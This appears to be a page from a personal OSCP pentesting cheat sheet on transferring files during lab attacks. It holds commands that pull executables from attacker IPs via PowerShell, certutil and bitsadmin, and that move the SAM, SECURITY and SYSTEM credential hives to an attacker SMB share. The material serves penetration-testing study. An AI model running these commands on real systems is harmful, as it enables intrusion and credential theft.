Pentesting Quick Reference OSCP and Beyond
  • Basic Tools & Techniques
  • Linux Basics
  • Windows Basics
  • Shells
  • Uploading Shells/ Transferring Files
  • FootPrinting
  • Host Discovery
  • Scanning
  • Vulnerability assessment
  • Metasploit and Meterpreter
    • Payloads
  • Brute Forcing/ Password Cracking
    • Attacking LSASS Passwords
    • Credentials Hunting Windows
    • Credential Hunting in Linux
    • Passwd, Shadow & Opasswd
    • Pass the Hash (PtH)
    • Protected Files
    • Protected Archives
    • Password Policies
    • Password Managers
    • Breached Credentials
    • Mimikatz
  • Linux Remote Management Protocols
  • Windows Remote Management Protocols
  • Port 20/21 - FTP Pentesting
  • Port 23 Telnet
  • Port 25 - SMTP
  • IMAP/ POP3
  • Port 53 DNS
  • Port 445 - SMB
  • Port 111 -RPC Bind
  • Port 135 - RPC
  • Port 137 NetBios
  • Port 161 SNMP
  • Port 1433 - MSSQL
  • Port 1521 Oracle TNS
  • Port 1833 - MQTT
  • Port 2049 - NFS
  • Port 3306 MySQL
  • Port 3389 - RDP
  • Port 5985 - Winrm
  • Port 632 (UDP) IPMI
  • Redis (6379)
  • Port 10000 Webmin
  • Privilege Escalation
    • Windows Priv esc
    • Linux Priv esc
  • Active Directory
    • AD Basics
      • AD Management Basics
    • Initial Enumeration of AD
      • Enumerating AD Users
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Password Spraying - Making a Target User List
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
      • Enumerating Security Controls
    • LLMNR Poisoning
    • SMB/ NTLM Relay Attacks
    • IPv6 Attacks
      • IPV6 DNS takeover
      • WPAD
    • Passback Attacks
    • AS-REP roasting
    • AD Shell
    • AD Enumeration
      • Credentialed Enumeration - from Linux
      • Credentialed Enumeration - from Windows
      • Living off the Land
      • BloodHound
      • Plumhound
      • Bloodhound CE
      • ldapdomaindump
      • PingCastle
    • Post Compromise
      • Kerberosting
        • Kerberos "Double Hop" Problem
      • Pass Attacks
        • Pass the Hash
        • Pass the Ticket
          • Pass the Ticket (PtT) from Windows
          • Pass the Ticket (PtT) from Linux
      • Token Impersonation
      • LNK File Attacks
      • Miscellaneous Misconfigurations
    • Access Control List (ACL) Abuse Primer
      • ACL Enumeration
      • ACL Abuse Tactics
      • DCSync
        • DCSync Example Forest HTB
    • Post Owning Domain
      • Attacking Active Directory & NTDS.dit 1
      • Golden Ticket Attacks
    • Privilege Escaltion
    • Bleeding Edge Vulnerabilities
    • Domain Trusts
      • Attacking Domain Trusts - Child -> Parent Trusts - from Windows
      • Attacking Domain Trusts - Child -> Parent Trusts - from Linux
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
    • Hardening Active Directory
    • Additional AD Auditing Techniques
    • HTB AD Enumeration & Attacks - Skills Assessment Part I
  • Web Pentesting
    • Subdomains, directories and Vhost listing
    • Command Injection
    • XSS
    • SQL Injection
    • Authentication Bypass
  • Cryptography
  • More Resources
  • Forensics
  • IoT Security
  • API Security
  • Binary Exploitation
    • Assembly Cheatsheat for Hackers
    • Malware Analysis
      • Basic Static Malware Analysis
  • Boxes/ Machines
    • Try Hack Me
      • Vulnversity
      • Basic Pentesting
      • Kenobi
      • Steel Mountain
    • Vulnhub
      • Tiki
    • HTB
      • Beep
      • Active
      • Forest
      • Devel
    • Metasploitable 2
    • PWN.COLLEGE Talking Web
    • PWN COLLGE Web Hacking
  • Private Challenges
    • Pwn
    • Forensics
  • Misc tools
    • NetExec
  • SOC Analyst Resources
  • OSCP Tips and Misc
  • Mobile Hacking
  • Buffer Overflow
  • Wordpress
  • Web3 and Blockchain Security
  • WIFI Hacking
    • WPS Hacking
    • Misc Tools
Powered by GitBook
On this page
  • Transfer files with SSH (SCP)
  • Python server
  • basic http-Server
  • Powershell downloading files
  • Certutil cmd windows
  • RDP with shared folder to transfer filer - xfreerdp
  • Download files from server to machine in Windows
  • SMB Files tranfer with impacket
  • Evil-winrm
  • Other web servers complete list

Uploading Shells/ Transferring Files

PreviousShellsNextFootPrinting

Last updated 1 year ago

Transfer files with SSH (SCP)

Best to copy to tmp folder as there are no restrictions mostly

scp /opt/LinEnum.sh [email protected]:/tmp  
scp [email protected]:/home/ubuntu/documents.txt notes.txt

Python server

python3 -m  http.server

basic http-Server

http-server -p 8080

Powershell downloading files

(new-object System.Net.WebClient).DownloadFile('http://10.9.88.34:8000/SharpHound.ps1', 'C:\Users\Administrator\Downloads\SharpHou
nd.ps1')

from cmd
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.30:9005/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

Certutil cmd windows

certutil -urlcache -f http://10.10.14.29:80/checkmate.exe checkmate.exe

RDP with shared folder to transfer filer - xfreerdp

xfreerdp /u:bob /p:HTB_@cademy_stdnt! /v:10.129.202.99 +clipboard /drive:Home,/home/kali/Downloads

Download files from server to machine in Windows

bitsadmin /transfer myDownloadJob http://192.168.18.144:8000/ammar.txt E:\Study\CEH\ammar.txt

SMB Files tranfer with impacket

start smb server on attacker machine

                                                                                                                                                                       
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-smbserver desktop ~/Downloads -smb2support -username test -password test
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

We can also use it without specifying username and password

ammartiger@htb[/htb]$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

And now you can make aval this share on the windows system as a separate drive

controller\administrator@DOMAIN-CONTROLL C:\>net use z: \\10.9.88.34\desktop /user:test test
The command completed successfully.

And now you can transfer files to and fro from both machines.

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator\Downloads>copy SharpHound.ps1 z: 
        1 file(s) copied. 

We can also directly move files without setting it as drive.

C:\> move sam.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move security.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move system.save \\10.10.15.16\CompData
        1 file(s) moved.

Evil-winrm

You can use upload and download command to transfer files

Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20230730011352_BloodHound.zip
                                        
Info: Downloading C:\Users\svc-alfresco\Documents\20230730011352_BloodHound.zip to 20230730011352_BloodHound.zip
                                        
Info: Download successful!

Other web servers complete list

Windows File Transfers For Hackers - Juggernaut PentestingJuggernaut Pentesting Blog - A blog to help others achieve their goals in Cyber Security.
windows cheatsheat
Logo